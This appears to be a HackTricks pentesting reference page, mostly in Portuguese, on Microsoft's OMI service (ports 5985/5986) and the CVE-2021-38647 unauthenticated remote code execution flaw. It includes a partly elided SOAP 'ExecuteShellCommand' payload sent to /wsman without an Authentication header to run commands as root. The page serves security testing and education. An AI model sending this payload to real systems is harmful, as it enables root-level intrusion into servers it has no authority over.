4.3 KiB
5985,5986 - Pentesting OMI
{% hint style="success" %}
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Informações Básicas
OMI é apresentado como uma ferramenta de código aberto pela Microsoft, projetada para gerenciamento de configuração remota. É particularmente relevante para servidores Linux no Azure que utilizam serviços como:
- Azure Automation
- Azure Automatic Update
- Azure Operations Management Suite
- Azure Log Analytics
- Azure Configuration Management
- Azure Diagnostics
O processo omiengine é iniciado e escuta em todas as interfaces como root quando esses serviços são ativados.
As portas padrão utilizadas são 5985 (http) e 5986 (https).
Vulnerabilidade CVE-2021-38647
Como observado em 16 de setembro, servidores Linux implantados no Azure com os serviços mencionados são suscetíveis devido a uma versão vulnerável do OMI. Essa vulnerabilidade reside no manuseio de mensagens do servidor OMI através do endpoint /wsman sem exigir um cabeçalho de Autenticação, autorizando incorretamente o cliente.
Um atacante pode explorar isso enviando um payload SOAP "ExecuteShellCommand" sem um cabeçalho de Autenticação, forçando o servidor a executar comandos com privilégios de root.
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
Para mais informações sobre este CVE verifique isso.
Referências
- https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/
- https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/
{% hint style="success" %}
Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Confira os planos de assinatura!
- Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
- Compartilhe truques de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud.